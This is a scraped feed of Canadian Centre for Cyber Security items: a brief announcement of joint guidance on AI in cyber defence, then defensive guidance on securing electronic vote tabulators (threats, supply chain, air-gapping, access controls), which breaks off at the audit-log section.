Canadian Centre for Cyber Security Events

Canadian Centre for Cyber Security Events.

You can help create a culture of cyber security in your organisation by sharing awareness messages in your communities.

  • Joint guidance on opportunities for artificial intelligence in cyber defence
    by Canadian Centre for Cyber Security on August 12, 2026 at 2:00 pm

    <article data-history-node-id="8082" about="/en/news-events/joint-guidance-opportunities-artificial-intelligence-cyber-defence" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><p>The Canadian Centre for Cyber Security (Cyber Centre) has joined the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) and the following international partners in releasing cyber security guidance on opportunities for artificial intelligence (AI) in cyber defence:</p> <ul><li>New Zealand’s National Cyber Security Centre (NCSC-NZ)</li> <li>United Kingdom’s National Cyber Security Centre (NCSC-UK)</li> </ul><p>AI presents a significant opportunity for cyber defenders. When used safely, securely and responsibly, AI can:</p> <ul><li>strengthen prioritisation of cyber risks</li> <li>improve detection of threats and vulnerabilities</li> <li>support faster response and recovery</li> <li>reduce reliance on repetitive manual tasks</li> </ul><p>The joint guidance explains how organizations can use AI to improve their cyber security while also managing the risks that come with using AI. The guidance describes how the cyber security environment is changing and shows how AI can support key security activities, including governance, identifying risks, protecting systems, detecting threats, responding to incidents, and recovering from cyber attacks.</p> <p>The guidance also provides practical principles for adopting AI securely and includes important questions that cyber security teams should ask AI vendors to help ensure AI tools are used safely and securely.</p> <p>Consult the full joint guidance: <a href="https://www.cyber.gov.au/business-government/secure-design/artificial-intelligence/opportunities-for-ai-in-cyber-defence?ref=search">Opportunities for AI in cyber defence – Use of AI by cyber-security teams</a></p> </div> </div> </div> </div> </div> </article>

  • Security considerations for electronic vote tabulators – ITSM.10.102
    by Canadian Centre for Cyber Security on August 6, 2026 at 12:48 pm

    <article data-history-node-id="8032" about="/en/guidance/security-considerations-electronic-vote-tabulators-itsm10102" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><p>The use of ballot counting systems, also known as vote tabulation technology, to replace manual ballot counting during democratic elections is gaining wider adoption. These technologies can help improve the efficiency of the ballot tabulation process, as well as reduce human-related errors during the ballot counting process.</p> <p>This publication provides guidance on the cyber security considerations and system requirements for deploying vote tabulators during democratic elections. It highlights the key risks, threats and safeguards that elections management authorities should assess when considering ballot counting systems.</p> <section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#1">Scope</a></li> <li><a href="#2">Electronic voting</a> <ul><li><a href="#fig1">Figure 1: Generic elections system architecture</a></li> </ul></li> <li><a href="#3">Ballot counting and tabulation</a> <ul><li><a href="#3.1">Types of vote tabulators</a></li> </ul></li> <li><a href="#4">Threat analysis</a></li> <li><a href="#5">Security control considerations</a> <ul><li><a href="#5.1">Physical and hardware security</a></li> <li><a href="#5.2">Lifecycle security</a></li> <li><a href="#5.3">Continuous risk assessment</a></li> <li><a href="#5.4">Protect your data</a></li> <li><a href="#5.5">Network isolation safeguards</a></li> <li><a href="#5.6">Secure access controls</a></li> <li><a href="#5.7">Validate and authenticate devices</a></li> <li><a href="#5.8">Patches and system updates</a></li> <li><a href="#5.9">Secure application development</a></li> <li><a href="#5.10">Audit log monitoring</a></li> <li><a href="#5.11">Business continuity</a></li> <li><a href="#5.12">Educate users</a></li> <li><a href="#5.13">Security control effectiveness</a></li> </ul></li> <li><a href="#6">Conclusion</a></li> </ul></details></section><section class="mrgn-tp-md"><p>Adopting digital technologies to improve the efficient delivery of the electoral process is an increasingly attractive proposition for modern democratic elections. Elections administrators are embracing the use of modern digital methods to improve or replace traditional and manual voting processes. Manual counting can be subject to human errors from fatigue, eyestrain, or distractions, which can lead to ballots being misjudged and misallocated. In very tight electoral races, those errors can have serious consequences. Using electronic vote counting technologies to support aspects of the elections process can help prevent human-related computational errors, expand voter accessibility options, and improve election transparency. These technologies can also allow for the timely reporting of elections results.</p> <p>Although federal elections in Canada do not use vote tabulators or ballot counting systems, these systems have been used in provincial and municipal government elections. Vote tabulators are electronic devices used to automate the counting of marked paper ballots. Some specific models may support the storage of digital ballot records, integration with assistive devices or vote capturing capabilities, and other additional functionalities. However, despite their potential benefits, the associated risks must be carefully considered.</p> <p>Replacing traditional processes with vote tabulators can have many advantages; however, this can introduce new vulnerabilities and threats into the democratic process, allowing threat actors opportunities to inflict harm. These threats may come from sophisticated nation-state actors or unprincipled stakeholders interested in disrupting the peaceful conduct of the democratic process. Before deploying vote tabulators, elections authorities should conduct a detailed risk assessment to evaluate the potential risks and associated security threats. The Cyber Centre’s <a href="/en/guidance/cyber-threats-canadas-democratic-process-2025-update">Cyber threats to democratic process: 2025 update</a> assesses that the likelihood for state-sponsored cyber actors to target Canadian elections is <strong>almost certain</strong>. It is important to understand specific risks and threats that may be associated with electronic vote tabulation deployments.</p> <p>In this publication, we discuss important cyber security considerations for elections administrators when deciding whether to use vote tabulators, the recommended secure architecture model for deploying these devices, as well as the security controls required to safeguard the integrity of the system. Note that it is difficult to establish suitably secure network connectivity for any election’s infrastructure.</p> </section><h2 id="1">Scope</h2> <p>This guidance applies to vote-tabulation systems that process paper ballots only, not systems that handle electronic ballots. While some recommendations may also apply to electronic ballot systems, they may not fully address the distinct threats those systems face.</p> <h2 id="2">Electronic voting</h2> <p>Electronic voting system architectures are complex and can involve many disparate systems. An electronic voting system architecture describes the information systems components involved in electronic voting and how these components interact with each other. These systems may include:</p> <ul><li>public websites</li> <li>party registration systems</li> <li>voter registrations systems</li> <li>ballot creation and printing systems</li> <li>election management systems</li> <li>online voting systems</li> <li>ballot counting or vote tabulation systems</li> <li>results publishing systems</li> </ul><p>These systems often run distinct software and firmware technologies, can be interconnected, and may communicate across diverse network protocols. Figure 1 depicts a generic modern electronic voting systems architecture, based on the Center for Internet Security’s (CIS) <a href="https://www.google.com/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=&amp;ved=2ahUKEwiyvL6B0MiCAxXQJjQIHXDTB0wQFnoECBYQAQ&amp;url=https%3A%2F%2Fwww.cisecurity.org%2Fwp-content%2Fuploads%2F2018%2F02%2FCIS-Elections-eBook-15-Feb.pdf&amp;usg=AOvVaw0Dq56eE-JFpTwo7r7o9ENs&amp;opi=89978449">Handbook for Elections Infrastructure Security</a>.</p> <div class="panel panel-default"> <div class="panel-body"> <figure id="fig1"><figcaption class="text-center"><strong>Figure 1: Generic elections system architecture</strong></figcaption><img alt="Generic elections system – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/itsm.10.102-fig1-e.png" /></figure><p><strong>Figure 1: Generic elections systems architecture</strong> presents a visual representation of a generic electronic voting system architecture. The image provides additional details on how ballots go from creation and printing to having the results counted and tabulated to the results being published.</p> <p>The components outlined in the image represent the entirety of a generic elections system architecture, including:</p> <ol><li>voter registration systems</li> <li>party and candidate registration and verification</li> <li>campaign finance management</li> <li>election management systems</li> <li>ballot creation and printing</li> <li>electronic poll books</li> <li>ballot capturing devices</li> <li>ballot counting and tabulation <ul><li>ballot scanners</li> <li>ballot counting and tabulators</li> </ul></li> <li>results transmission and publishing</li> </ol></div> </div> <p>This guidance is focused on the ballot counting and ballot tabulation components of this architecture. Our recommendations address core cyber security and operational issues that require attention to safely operate and deploy these systems. First, we provide a generic description for ballot counting and tabulation systems.</p> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 id="3">Ballot counting and tabulation</h2> <p>Ballot counting and tabulation is the process of counting and aggregating used and unused ballots in an election. The process involves gathering valid and invalid (spoiled) ballots, counting unused ballots, and aggregating valid ballots for each candidate in the election. Ballot counting and tabulation can be completed manually (namely by hand-counting) or by using electronic systems such as vote tabulators. Both methods can introduce errors in the process for various reasons. For example, if elections workers are tired or distracted, counting ballots by hand may lead to computational errors. Similarly, software flaws or compromises of electronic vote tabulators may lead to votes being inaccurately categorized. In general, it is important for elections administrators to continually assess counting methods and implement mechanisms to determine or validate that their counting processes are operating within accepted error rates.</p> <p>The ballot counting method used is often determined by legal provisions. For example, the <a href="https://laws-lois.justice.gc.ca/eng/acts/E-2.01/index.html"><em>Canada Elections Act</em></a> requires ballots cast during federal elections to be hand-counted, while some provinces, territories and municipalities have changed local laws to allow the use of electronic vote tabulators in their local elections.</p> <p>At a high level, a typical ballot counting and tabulation process includes the following activities:</p> <ul><li>validating each ballot</li> <li>sorting and counting valid or invalid (spoiled) cast ballots</li> <li>aggregating valid cast ballots for each candidate</li> <li>generating a tabulated summary from tallied ballots</li> </ul><p>Note that the transmission of election outcomes is considered a separate process, as this may require additional system components for transmitting and sharing that information. Results aggregation may also require additional collation at a central facility before official results are released.</p> <p>The following are some methods that may be used to tabulate ballots during elections.</p> <h3 class="h4">Manual counting and tabulation</h3> <p>In this method, elections officials manually sort, validate, and count casted paper ballots. All activities are done by hand, including generating election results tables. As noted by Elections Canada in the <a href="https://www.elections.ca/content.aspx?section=res&amp;dir=pub/ecdocs/rom/vIII/ch_2&amp;document=ch_2&amp;lang=e">Returning Officer’s Manual</a>, in Canadian federal elections, ballots are counted manually at polling stations, and preliminary results are then transmitted (often by telephone) to Elections Canada .</p> <p>For elections where a different tabulation method is primarily used (e.g. provincial or municipal elections), manual ballot counting and tabulation are commonly used as a fallback measure. Manual ballot counting and tabulation are also used to perform election audits. Manually counting and tabulating ballots can be tedious and time-consuming, especially for polling stations with higher voter density. While manual counting processes may provide a greater degree of trust due to their inherent simplicity and easier security auditability, they may allow for human subjectivity and errors.</p> <h3 class="h4">Electronic counting and tabulation</h3> <p>This method involves using electronic vote tabulators to sort, validate, and count election ballots. This method can be used to count both paper and digital ballots. Paper ballots are fed into and analyzed by the device while digital ballots are captured and processed. Electronic vote tabulators may have built-in printing capabilities or may support connectivity with external printers. Note that any external or peripheral devices connected to a vote tabulator must adhere to the same security control standards as the vote tabulator system. We recommend maintaining independence between the counting system and the ballot creation system so that a threat or attack against one does not impact the other.</p> <h3 id="3.1">Types of vote tabulators</h3> <p>There are different types of vote tabulators, often defined by their function, capabilities, and use cases.</p> <h4>Unit vote tabulators</h4> <p>These are digital scan machines that read and record ballots at a polling station. They are designed for light use only. They may or may not contain additional programmable capabilities which can assist with ballot validation, sorting, calculations, and local results processing.</p> <h4>Central tabulators</h4> <p>These are devices used to process ballots at a central location. They are typically industrial-sized and designed to process large amounts of ballots. They can also be used to rapidly perform large-scale recounts or to process mail-in ballots.</p> <h4>Optical scan tabulators</h4> <p>These are optical scan readers commonly used to help process marked paper ballots. These scanners rely on optical character recognition (OCR) or optical mark recognition (OMR) technology to read ballots. The scanner generates a digital representation of the original ballot which can then be used for additional processing. Optical scan systems are often used to process mail-in ballots.</p> <h2 id="4">Threat analysis</h2> <p>The Cyber Centre periodically releases an assessment of <a href="/en/guidance/cyber-threats-canadas-democratic-process-2025-update">Cyber threats to Canada’s democratic process (TDP)</a>. In its most update, the Cyber Centre assesses that democratic processes across the globe remain a target of interest for cyber threat actors and that the likelihood for state-sponsored cyber actors to target Canadian elections is <strong>almost certain</strong>. Vote tabulation systems may certainly introduce new vulnerabilities within the electoral process and may become a target for motivated, state-sponsored threat actors. Election agencies should conduct detailed threat and risk assessments to ensure that they understand the risks associated with using these systems and that vote tabulator systems are protected against such threats.</p> <p>Threat actors often seek to undermine public confidence in the legitimacy of the democratic process. According to the 2025 <abbr title="Cyber threats to Canada’s democratic process">TDP</abbr> report, state-sponsored actors may attempt to weaken trust by altering content on devices used during the elections process. Threat actors can infiltrate and compromise the supply chains used to procure vote tabulator devices. They can also launch disruptive attacks against these devices to render them inoperative, thereby impacting the smooth conduct of elections. Malicious actors can use targeted misinformation or disinformation campaigns to spread inaccuracies about the operation of vote tabulator devices, thereby undermining voter trust and confidence.</p> <p>State-sponsored threat actors have conducted numerous attacks against electoral systems and processes in recent years. For example, Ukraine, Estonia, Ecuador, and even the <abbr title="United Kingdom">UK</abbr>, have been targeted. Some of the attack vectors have included deploying disruptive malware on servers used to tabulate votes and planting fake results with the intention of releasing them publicly.</p> <p>Based on the prevailing threat environment, it is very likely that cybercriminals and state-sponsored actors will target ballot counting and tabulation processes to achieve their overall objectives. The following are ways threat actors could launch attacks and target ballot counting and tabulation systems:</p> <ul><li>taking over vote tabulation systems for the purpose of altering the results</li> <li>infiltrating device or systems-component manufacturers to compromise the supply chain for ballot counting and tabulation devices</li> <li>compromising elections record databases, resulting in unauthorized disclosure of confidential electronic voter records and undermining confidence in the democratic process</li> <li>disrupting vote tabulation system functions through exhaustion and destruction attacks such as distributed denial of service (DDoS) and ransomware attacks</li> <li>impersonating elections authorities to spread misinformation or falsehoods about the integrity of the process or devices to sow mistrust and erode confidence in the democratic process</li> <li>compromise privileged credentials to gain access to back-end systems to alter tabulation records or trigger further disruptive attacks</li> </ul><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 id="5">Security control considerations</h2> <p>In this section, we highlight important security controls you should consider when acquiring, deploying, and operating vote tabulation systems. These recommendations are aligned with the Cyber Centre’s <a href="/en/guidance/cyber-security-privacy-risk-management/itsp10033">Cyber security and privacy risk management: A lifecycle approach (ITSP.10.033)</a>. Election administrators should consider foundational system design and security principles to safeguard hardware, firmware, software components, and related processes.</p> <h3 id="5.1">Physical and hardware security</h3> <p>Physical layer protections in vote tabulator systems are critical in ensuring that other security controls can be trusted, and that the entire system operates as intended. Vote tabulators must be designed, manufactured, operated, and decommissioned in accordance with secure by design principles to better protect them against threats, such as supply chain compromise during any stage of its lifecycle.</p> <h4>Design systems to withstand physical and environmental hazards</h4> <p>Vote tabulators should be designed for operational resilience . The devices, storage media, and other system components should be able to withstand physical and environmental hazards, such as physical shocks, high humidity, and temperature fluctuations, to protect against data loss. These devices should also have an emergency power supply; an intelligent back-up power system will also allow for graceful power-down processes. It is important to protect devices and their electronic data from power surges and outages. We also recommend having electromagnetic shielding and tamper-evident seals as feature considerations.</p> <h4>Manufactured for purpose</h4> <p>Vote tabulators should be manufactured for a single purpose to ensure security functions are operating within defined security boundaries. Single purpose systems avoid the complexity associated with multi-use designs, while also ensuring system functions are strictly defined and security restrictions can be adequately enforced. General-purpose or multi-use systems extend the attack surface, providing additional opportunities for the adversary to compromise. We recommend that vote tabulators should be purpose-built and dedicated, single-use systems.</p> <h4>Operate systems with strict physical access controls</h4> <p>When deploying and operating vote tabulators, you should implement strict physical access controls. Only authorized individuals on approved access lists should have physical access to the devices before, during, and after elections. The locations where these devices are stored, deployed, or transported throughout their lifecycle should be monitored, and mechanisms should be in place to detect and deter unauthorized access. When choosing where to deploy vote tabulators, you should consider how you will secure them from unauthorized observation and access. Device screens should be set up to prevent on-screen information from being read or observed from a distance. Electoral management bodies (EMBs) should maintain access records for each device throughout its lifecycle, from acquisition to decommissioning.</p> <h4>Monitor systems and maintain strong chain of custody records</h4> <p>Maintaining chain of custody records plays a significant role in ensuring the physical and logical integrity of the vote tabulators. Elections administrators should implement rigorous chain of custody practices to prevent tampering and other malicious device alterations. The following are some ways of protecting vote tabulators and the data contained therein.</p> <ul><li>Record all vote tabulator devices movement and access throughout their lifecycles</li> <li>Use tamper-evident seals</li> <li>Transport vote tabulators in secure containers to and from polling centres</li> <li>Document and verify chain of custody when transporting vote tabulators</li> <li>Protect and authenticate all physical access to vote tabulation equipment</li> <li>Review security monitoring controls before, during, and after elections to validate their effectiveness</li> <li>Decommission devices when chain of custody records cannot be securely validated</li> </ul><p>Device decommissioning procedures must ensure devices are cryptographically sanitized before disposal or destruction. Use only approved sanitization methods appropriate for the device media and use-case. Some sanitization methods are not effective or suitable on some media types. For example, solid-state drives (SSD) require at least a double overwrite pass and a secure erasure (SE) to achieve the sanitization objectives. For more information on Cyber Centre recommended guidance, refer to <a href="/en/guidance/it-media-sanitization-itsp40006">IT media sanitization (ITSP.40.006)</a>.</p> <h3 id="5.2">Lifecycle security</h3> <p>Democratic processes may be vulnerable to planned, persistent threats because of system lifecycle risks. In the context of information technology (IT) security risk management, “lifecycle” refers to the design/development, acquisition, integration/installation, operation, monitoring, maintenance, and disposal of <abbr title="information technology">IT</abbr> assets which, for the purposes of this guidance, include electronic vote tabulators. Examples of lifecycle risks to electronic vote tabulators include procuring them through unsecure supply chains or having them designed or developed by unverified or untrusted manufacturers. Therefore, you should keep security in mind at every stage of a vote tabulator’s lifecycle and address and mitigate potential risks that could allow threat actors to compromise the integrity of an election.</p> <h4>Acquire devices through trusted supply chains</h4> <p>Vote tabulation systems typically contain millions of individual micro-components, as well as component sub-systems such as an image scanner unit, a paper ballot verification unit, device firmware or software, power systems, data storage units, and others. Threat actors can infiltrate supply chains to compromise the security of these devices and systems. The complexity of modern system lifecycles makes it difficult for commercially available systems to guarantee protection against supply chain embedded compromises. As a result, organizations should assume such compromises may exist on their device. We recommend adopting strategies to assess and mitigate supply chain-related risks by following the <a href="/en/guidance/cyber-supply-chain-approach-assessing-risk-itsap10070">Cyber Centre’s approach to assessing cyber supply chain risks</a>.</p> <p>Elections officials should source vote tabulators and system components through trusted supply chains and physically inspect the devices before and after acquiring them, as well as before, during and after elections. Vote tabulators should have tamper-evident seals, tape, or security labelling to aid the detection of unauthorized physical access or unauthorized changes to hardware or physical system components.</p> <p>Elections administrators should establish secure procurement procedures to limit the potential for threat actors to infiltrate supply chains. The following are some actions that could ensure the security of the vote tabulator infrastructure supply chain:</p> <ul><li>Establish a supply chain risk management (SCRM) program to assess risks associated with procurement processes <ul><li>Assess and vet all technology suppliers to ensure underlying processes and relationships are secure</li> <li>Periodically assess suppliers and their cyber security practices</li> </ul></li> <li>Ensure that only trusted and vetted supplier personnel have access to sensitive electoral and system data throughout the system development lifecycle</li> <li>Collaborate with technology vendors to ensure verification processes are in place <ul><li>Ensure that the components of vote tabulators are genuine and have not been compromised through third-party relationships</li> <li>Specifically, work with vote tabulator manufacturers to implement tools to validate the integrity of hardware, firmware, and software running on tabulation devices</li> </ul></li> <li>Election agencies can also request information on detailed Hardware Bill of Materials (HBOM) or Software Bill of Materials (SBOM) to adequately track vulnerability risks associated with hardware and software components</li> </ul><p>For more information on supply chain cyber security, read <a href="/en/guidance/supply-chain-threats-and-commercial-espionage">Supply chain threats and commercial espionage</a> and <a href="/en/guidance/supply-chain-security-small-and-medium-sized-organizations-itsap00070">Supply chain security for small and medium-sized organizations (ITSAP.00.070)</a>.</p> <h3 id="5.3">Continuous risk assessment</h3> <p>Electoral management authorities should conduct a comprehensive risk analysis of the use of vote tabulators and understand the potential impact on the security of the entire electoral process. Assessing the risks of using vote tabulators should not be done in isolation.</p> <h4>Ascertain the risks associated with using vote tabulation systems</h4> <p><abbr title="electoral management bodies">EMBs</abbr> should consider technology in elections from a risk-management approach. While vote tabulators may offer opportunities for improving elections operations, it is important to understand the associated risks, which then may be mitigated, accepted, or avoided. Transferring the risk is not acceptable, as a compromise of a democratic process can have substantial reputational impacts. <abbr title="electoral management bodies">EMBs</abbr> should also avoid using vote tabulators if they are unprepared or unwilling to accept the associated risks. For more information on evaluating and managing risk, please consult our guidance <a href="/en/guidance/cyber-security-privacy-risk-management/itsp10033">Cyber security and privacy risk management: A lifecycle approach</a> and Security risk assessment for online voting systems supporting democratic processes (ITSM.10.103)</p> <h3 id="5.4">Protect your data</h3> <p>Electronic vote tabulators process, create, and store ballot data. Data is a critical asset for any business process, and especially for democratic processes that rely on digital systems. Therefore, you should have security mechanisms in place to protect the confidentiality, integrity, and availability of all forms of data, whether it is stored on the tabulation device or is in transit for processing.</p> <h4>Establish a holistic data security strategy</h4> <p>A holistic election data security strategy should be established to govern and secure electoral data throughout its lifecycle. This strategy should include data policies, acceptable handling procedures, and guidelines for managing data on vote tabulators. Data security policies may include recommendations on storage media types, secure data processing mechanisms, cryptographic standards, storage data formats, and data encryption. You may also consider performing a data security assessment to identify all data flows, paths, inputs, and outputs to and from the vote tabulator. However, there is no fully secure way to connect vote tabulators to electronic networks. Your data security strategy should address how to secure vote tabulator data throughout its lifecycle, from creation to destruction. For example, it should address how you plan to secure physical and digital ballots, restrict and manage access, enforce data encryption, and ensure compliance with legal requirements wherever your data may reside.</p> <h4>Appropriately classify data</h4> <p>Data classification represents a crucial component upon which many other security activities rely, especially when identifying appropriate security control mechanisms to protect the data. Data on vote tabulators typically exists at different classification levels and the choice of safeguards or security controls should take this into account. The vote tabulation system should be designed based on the highest classification of data or system components. For example, vote tabulators may be required to process cryptographic keys and data validation certificates may be used to encrypt and validate the integrity of election data.</p> <p>Cryptographic keys represent highly sensitive data and may necessitate higher data classification. The vote tabulation system must be designed to implement security controls at the highest level determined. For more information on data classification assessments, read our publication <a href="/en/guidance/cyber-security-privacy-risk-management/itsp10033">Cyber security and privacy risk management: Security and privacy controls and assurance activities catalogue (ITSP.10.033)</a>.</p> <p>Classifying data properly, together with implementing matching secure handling controls, can reduce the risk of a data compromise. Elections authorities should put processes in place to ensure that assets are only accessible to users on a ‘need to know’ basis and that electoral systems are only accessed using devices with the appropriate security authorization. Furthermore, only authorized devices should be used for processing and disseminating of elections-related data.</p> <h4>Protect data with cryptographic controls</h4> <p>Vote tabulator data should be protected with cryptographic mechanisms whether it is at rest or in transit (including on portable devices). Ballot data and vote counts should be secured against unauthorized disclosure and integrity attacks prior before and after they are officially released through authorized channels. Encryption can help protect data from unauthorized disclosure and modification. You should identify where the data resides at various points and then ensure you apply appropriate security controls to mitigate the risk of unauthorized use or disclosure. We recommend using only approved cryptographic algorithms and protocols. For more information on recommended cryptographic algorithms, read <a href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Guidance on cryptographic algorithms for Unclassified, Protected A, and Protected B information (ITSP.40.111</a>). Maintaining a secure cryptographic key management system is important. Ensure you securely manage when, how, and where your encryption keys are created, stored, and destroyed. Implement a secure backup procedure for encryption keys to enable data recovery.</p> <h4>Consider data privacy protections</h4> <p>In Canada, election data is subject to privacy laws, including the <a href="https://laws-lois.justice.gc.ca/eng/acts/P-21/"><em>Privacy Act</em></a>. These laws mandate that a minimum set of security controls, such as data encryption and access management controls, be implemented to protect information about the voting public and ballots. We recommend you implement appropriate data privacy protections for ballots and voters’ information. The <a href="https://laws-lois.justice.gc.ca/eng/acts/E-2.01/index.html"><em>Canada Elections Act</em></a> requires Elections Canada to share voting data, including elections results, with political parties and provincial governments. Vote tabulators must be evaluated to ascertain compliance and alignment with ballot secrecy and privacy laws. Data residency considerations should also be evaluated, as election laws may require data (in-transit or at rest) to reside within specific geographical boundaries.</p> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h3 id="5.5">Network isolation safeguards</h3> <p>Due to the threat environment and the associated risks posed by state-sponsored threat activity, we recommend that you do not connect vote tabulators to any network at any time. Prior to elections, vote tabulators should be configured without any network connectivity, including Bluetooth and Wi-Fi, and should never be connected to the Internet at any point of their lifecycle. Data should be transferred to and from vote tabulators using non-network procedures, such as trusted portable storage devices or paper-based procedures.</p> <p>Strict network isolation (airgaps) is the most effective means of mitigating pre-existing compromises that may have been introduced through lifecycle attacks. Network isolation greatly increases the amount of effort required to gain remote command and control of a compromised system and forces an adversary to activate or control the compromised vote tabulator or related system through an alternative data channel, such as acoustic, or through procedural means, such using a compromised systems administrator. Certain serious attacks, like “logic bombs” that autonomously activate based on pre-set conditions, could remain on the system even without network connectivity, but the scope and sophistication of the possible attacks is much smaller without network command and control.</p> <h4>Establish strict network defences</h4> <p>Although deploying vote tabulators on a network is not recommended, elections administrators may still choose to deploy these systems on a network. In such cases, the network infrastructure supporting vote tabulators should be protected against interception, unauthorized data disclosure, modification, and denial of service attacks. You should implement measures to protect against ransomware attacks that may target the tabulation systems. You should track vulnerabilities and fully patch all devices before deploying them for elections. The following are some actions that you can take to implement a defence-in-depth or layered defensive approach to protecting your networks from threat actors.</p> <ul><li>Use firewalls or network zoning protections to restrict network access to sensitive assets on the network</li> <li>Consider deploying network threat detection/protection systems to mitigate network-based attacks</li> <li>Update network devices regularly to minimize exposure to vulnerabilities</li> <li>Harden network devices by disabling unnecessary services, ports, protocols and applications</li> <li>Avoid connecting vote tabulators to public or untrusted networks</li> <li>Disable Internet connectivity on vote tabulators or interconnected systems</li> <li>Implement protection against threats associated with third-party (vendors or partners) network connectivity</li> </ul><h3 id="5.6">Secure access controls</h3> <p>When designing and building an electronic tabulation system, it is essential to properly manage user and administrative privileges, isolate sensitive functions, and incorporate security engineering principles. User access rights should be restricted to only those required to perform assigned tasks. System functions should implement the principle of least privilege, which only gives users the set of privileges that is essential for them to perform authorized tasks. The following are some recommended actions you can take to implement secure access controls within vote tabulation systems.</p> <ul><li>Verify that all personnel with administrative access to the system at any point in the lifecycle meet the necessary personnel security requirements <ul><li>For example, some electoral systems may require that administrative access be given only to Canadian citizens with a valid security clearance</li> </ul></li> <li>Maintain formal security vetting for all personnel with administrative access throughout the lifecycle <ul><li>Require personnel security screening and background checks for personnel requiring privileged or administrative access to the election and voting infrastructure; software developers, hardware assembly technicians, program managers, and election administrators responsible for administering federal elections will require a security clearance to support the voting infrastructure</li> <li>Ensure administrative accounts are used exclusively to perform administrative tasks and that these privileges are regularly audited</li> </ul></li> <li>Employ two-person control for all interactions with vote tabulators during their lifecycle, except for the moment when individual voters cast ballots</li> <li>Do not share access credentials; ensure that each user has unique credentials to access vote tabulation systems</li> <li>Enforce the use of passphrases or strong passwords on voting systems</li> <li>Use strong authentication protocols and never store passwords in plain text</li> <li>Protect authentication parameters with modern hashing algorithms to provide resilience against cryptographic attacks</li> <li>Require multi-factor authentication (MFA) mechanisms for administrative access to vote tabulation systems</li> </ul><p>For more information on account and access management, read <a href="/en/guidance/best-practices-passphrases-and-passwords-itsap30032">Best practices for passphrases and passwords (ITSAP.30.032)</a>, <a href="/en/guidance/secure-your-accounts-and-devices-multi-factor-authentication-itsap30030">Secure your accounts and devices with multi-factor authentication (ITSAP.30.030)</a>, and <a href="/en/guidance/top-10-it-security-actions-no3-managing-controlling-administrative-privileges-itsm10094">Top 10 <abbr title="information technology">IT</abbr> security actions: No. 3 Managing and controlling administrative privileges (ITSM.10.094)</a>.</p> <h4>Lock down devices</h4> <p>Elections administrators should ensure that the configuration and security settings shipped with vote tabulators are updated to align with organizational policies. Elections administrators should also consider taking the following actions to lock down vote tabulators:</p> <ul><li>Restrict the services enabled on the systems and devices, and prevent users from creating or changing system settings or configurations <ul><li>Only enable services that are required for performing intended tasks</li> </ul></li> <li>Disconnect external devices, such as printers, fax systems, and computing devices, from voting tabulators when they are not in use</li> <li>Restrict access to any existing auxiliary or data ports <ul><li>If there is an operational need to enable these ports, it should be evaluated through a risk assessment review process</li> </ul></li> </ul><h3 id="5.7">Validate and authenticate devices</h3> <p>It is important to implement robust authentication mechanisms to ensure that vote tabulation devices remain trusted. Consider mechanisms to continuously validate and authenticate the integrity of vote tabulators through their lifecycle. For example, confirm the validity of trusted public key infrastructure (PKI) digital signatures on software packages. Elections administrators should consider software logic and accuracy testing to validate that the vote tabulators operate as expected. Using device cryptographic certificates can also help with physical device certification.</p> <h3 id="5.8">Patches and system updates</h3> <p>It is essential to undertake regular patch management to protect the vote tabulator against known and unknown threats. You should also implement the following measures:</p> <ul><li>Ensure device firmware and software are kept up to date</li> <li>Apply device patches and software updates regularly</li> <li>Use cryptographic mechanisms to verify firmware and software before applying updates</li> <li>Validate that update deployment cycles do not operationally impact scheduled election events</li> </ul><h3 id="5.9">Secure application development</h3> <p>Elections administrators may require software application development or procurement to meet specific legal or bylaw requirements. Security considerations should be evaluated throughout all phases of the development or procurement process. Regardless of the software application acquisition model selected, security requirements should be clearly defined and documented to assess functional and security objectives. Threat modeling or threat assessment techniques can also be used to identify and address potential threats associated with software applications to be deployed on the vote tabulator. Modern software stacks are so complex that lifecycle compromises should be assumed. Elections agencies can reduce their attack surface by identifying and managing risks early during the application design stage and architect to adequately mitigate those risks.</p> <h4>Software application testing</h4> <p>Static and dynamic testing approaches may be used to test the security of system software. Static testing involves source and binary code testing, while dynamic testing involves testing the application in functional use. Your software assurance process should allow you to evaluate applications in a test environment. Adopt functional and penetration testing controls to validate security objectives and address all identified vulnerabilities. Do not assume that an application has been vetted; instead, conduct your assessment in line with your security objectives. Leverage formal testing standards such as those defined by <a href="https://www.cyber.gc.ca/en/tools-services/common-criteria">Common Criteria</a>, <a href="https://owasp.org/www-project-application-security-verification-standard/">OWASP Application Security Verification Standard (ASVS)</a>, and <a href="https://www.iso.org/obp/ui/en/#iso:std:iso-iec:27034:-1:ed-1:v1:en">ISO/IEC 27034-1 Information technology — Security techniques ― Application security</a>.</p> <h3 id="5.10">Audit log 